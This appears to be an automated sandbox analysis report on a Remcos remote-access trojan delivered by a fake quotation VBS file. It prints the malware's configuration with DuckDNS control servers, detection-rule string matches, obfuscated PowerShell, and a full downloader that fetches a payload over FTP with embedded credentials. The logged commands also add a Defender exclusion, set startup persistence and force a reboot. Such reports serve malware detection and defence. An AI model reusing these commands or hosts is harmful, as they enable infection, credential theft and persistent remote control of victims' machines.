    • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8156 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AddInProcess32.exe (PID: 1888 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "2harbu03.duckdns.org:3980:0janbours92harbu04.duckdns.org:3981:1janbours92harbu007.duckdns.org:3981:1", "Assigned name": "MANIFESTATIONS", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "Rmc-NACZDT", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000016.00000002.2292074002.0000000000C38000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x6c4b8:$a1: Remcos restarted by watchdog!
            • 0x6ca30:$a3: %02i:%02i:%02i:%03i
            Click to see the 34 entries
            SourceRuleDescriptionAuthorStrings
            22.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              22.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                22.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  22.2.AddInProcess32.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x6aab8:$a1: Remcos restarted by watchdog!
                  • 0x6b030:$a3: %02i:%02i:%02i:%03i
                  22.2.AddInProcess32.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x64b7c:$str_b2: Executing file:
                  • 0x65bfc:$str_b3: GetDirectListeningPort
                  • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x65728:$str_b7: \update.vbs
                  • 0x64ba4:$str_b9: Downloaded file:
                  • 0x64b90:$str_b10: Downloading file:
                  • 0x64c34:$str_b12: Failed to upload file:
                  • 0x65bc4:$str_b13: StartForward
                  • 0x65be4:$str_b14: StopForward
                  • 0x65680:$str_b15: fso.DeleteFile "
                  • 0x65614:$str_b16: On Error Resume Next
                  • 0x656b0:$str_b17: fso.DeleteFolder "
                  • 0x64c24:$str_b18: Uploaded file:
                  • 0x64be4:$str_b19: Unable to delete:
                  • 0x65648:$str_b20: while fso.FileExists("
                  • 0x650c1:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 45 entries
                  SourceRuleDescriptionAuthorStrings
                  amsi64_3200.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHMAaQ' + [char]66 + 'tAG8Abg' + [char]66 + 'hAHMAdA' + [char]66 + 'vAGwAZQ' + [char]66 + 'yAGMAaQ' + [char]66 + '1AGMALg' + [char]66 + 'yAG8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAHMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAC4AdA' + [char]66 + '4AHQAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJw' + [char]66 + 'JAFYARg' + [char]66 + 'yAHAAJwAgACgAZA' + [char]66 + 'vAGgAdA' + [char]66 + 'lAE0AdA' + [char]66 + 'lAEcALgApACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAKA' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HAC4AKQAgAFoAYw' + [char]66 + 'CAGMAYQAkACAAKA' + [char]66 + 'kAGEAbw' + [char]66 + 'MAC4Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAdA' + [char]66 + 'uAGUAcg' + [char]66 + 'yAHUAQwA6ADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwApACAAKQAgACcAQQAnACAALAAgACcAkyE6AJMhJwAgACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAUgAuAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TADQANg' + [char]66 + 'lAHMAYQ' + [char]66 + 'CAG0Abw' + [char]66 + 'yAEYAOgA6AF0AdA' + [char]66 + 'yAGUAdg' + [char]66 + 'uAG8AQwAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIA' + [char]66 + 'dAF0AWw' + [char]66 + 'lAHQAeQ' + [char]66 + 'CAFsAOwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAD0AIA' + [char]66 + 'YAFAAVQ' + [char]66 + '1AGgAJAA7ACkAIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAAgAD0AIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAKA' + [char]66 + 'lAHMAbw' + [char]66 + 'wAHMAaQ' + [char]66 + 'kAC4AdA' + [char]66 + '6AHYAaw' + [char]66 + 'xACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwAR
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHMAaQ' + [char]66 + 'tAG8Abg' + [char]66 + 'hAHMAdA' + [char]66 + 'vAGwAZQ' + [char]66 + 'yAGMAaQ' + [char]66 + '1AGMALg' + [char]66 + 'yAG8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAHMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAC4AdA' + [char]66 + '4AHQAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJw' + [char]66 + 'JAFYARg' + [char]66 + 'yAHAAJwAgACgAZA' + [char]66 + 'vAGgAdA' + [char]66 + 'lAE0AdA' + [char]66 + 'lAEcALgApACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAKA' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HAC4AKQAgAFoAYw' + [char]66 + 'CAGMAYQAkACAAKA' + [char]66 + 'kAGEAbw' + [char]66 + 'MAC4Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAdA' + [char]66 + 'uAGUAcg' + [char]66 + 'yAHUAQwA6ADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwApACAAKQAgACcAQQAnACAALAAgACcAkyE6AJMhJwAgACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAUgAuAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TADQANg' + [char]66 + 'lAHMAYQ' + [char]66 + 'CAG0Abw' + [char]66 + 'yAEYAOgA6AF0AdA' + [char]66 + 'yAGUAdg' + [char]66 + 'uAG8AQwAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIA' + [char]66 + 'dAF0AWw' + [char]66 + 'lAHQAeQ' + [char]66 + 'CAFsAOwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAD0AIA' + [char]66 + 'YAFAAVQ' + [char]66 + '1AGgAJAA7ACkAIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAAgAD0AIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAKA' + [char]66 + 'lAHMAbw' + [char]66 + 'wAHMAaQ' + [char]66 + 'kAC4AdA' + [char]66 + '6AHYAaw' + [char]66 + 'xACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwAR
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$xglvh = (New-Object Net.WebClient);$xglvh.Encoding = [System.Text.Encoding]::UTF8;$xglvh.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$qkvzt.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $qkvzt.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$qkvzt.dispose();$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $qkvzt.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.revres/segami/or.cuicrelotsanomis//:sptth' , $huUPX , 'D D1D' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$xglvh = (New-Object Net.WebClient);$xglvh.Encoding = [System.Text.Encoding]::UTF8;$xglvh.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidati
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHMAaQ' + [char]66 + 'tAG8Abg' + [char]66 + 'hAHMAdA' + [char]66 + 'vAGwAZQ' + [char]66 + 'yAGMAaQ' + [char]66 + '1AGMALg' + [char]66 + 'yAG8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAHMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAC4AdA' + [char]66 + '4AHQAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJw' + [char]66 + 'JAFYARg' + [char]66 + 'yAHAAJwAgACgAZA' + [char]66 + 'vAGgAdA' + [char]66 + 'lAE0AdA' + [char]66 + 'lAEcALgApACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAKA' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HAC4AKQAgAFoAYw' + [char]66 + 'CAGMAYQAkACAAKA' + [char]66 + 'kAGEAbw' + [char]66 + 'MAC4Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAdA' + [char]66 + 'uAGUAcg' + [char]66 + 'yAHUAQwA6ADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwApACAAKQAgACcAQQAnACAALAAgACcAkyE6AJMhJwAgACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAUgAuAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TADQANg' + [char]66 + 'lAHMAYQ' + [char]66 + 'CAG0Abw' + [char]66 + 'yAEYAOgA6AF0AdA' + [char]66 + 'yAGUAdg' + [char]66 + 'uAG8AQwAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIA' + [char]66 + 'dAF0AWw' + [char]66 + 'lAHQAeQ' + [char]66 + 'CAFsAOwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAD0AIA' + [char]66 + 'YAFAAVQ' + [char]66 + '1AGgAJAA7ACkAIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAAgAD0AIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAKA' + [char]66 + 'lAHMAbw' + [char]66 + 'wAHMAaQ' + [char]66 + 'kAC4AdA' + [char]66 + '6AHYAaw' + [char]66 + 'xACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwAR
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$xglvh = (New-Object Net.WebClient);$xglvh.Encoding = [System.Text.Encoding]::UTF8;$xglvh.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$qkvzt.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $qkvzt.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$qkvzt.dispose();$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $qkvzt.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.revres/segami/or.cuicrelotsanomis//:sptth' , $huUPX , 'D D1D' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3200, ParentProcessName: powershell.exe, ProcessCommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, ProcessId: 1644, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\kevzykrtgrszbixbneqedqimjxlmbhz.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\kevzykrtgrszbixbneqedqimjxlmbhz.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ParentProcessId: 7784, ParentProcessName: AddInProcess32.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\kevzykrtgrszbixbneqedqimjxlmbhz.vbs" , ProcessId: 7300, ProcessName: wscript.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\kevzykrtgrszbixbneqedqimjxlmbhz.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\kevzykrtgrszbixbneqedqimjxlmbhz.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ParentProcessId: 7784, ParentProcessName: AddInProcess32.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\kevzykrtgrszbixbneqedqimjxlmbhz.vbs" , ProcessId: 7300, ProcessName: wscript.exe
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs", ProcessId: 5720, ProcessName: wscript.exe
                    Source: Process startedAuthor: frack113: Data: Command: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x2.ps1", CommandLine: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x2.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) 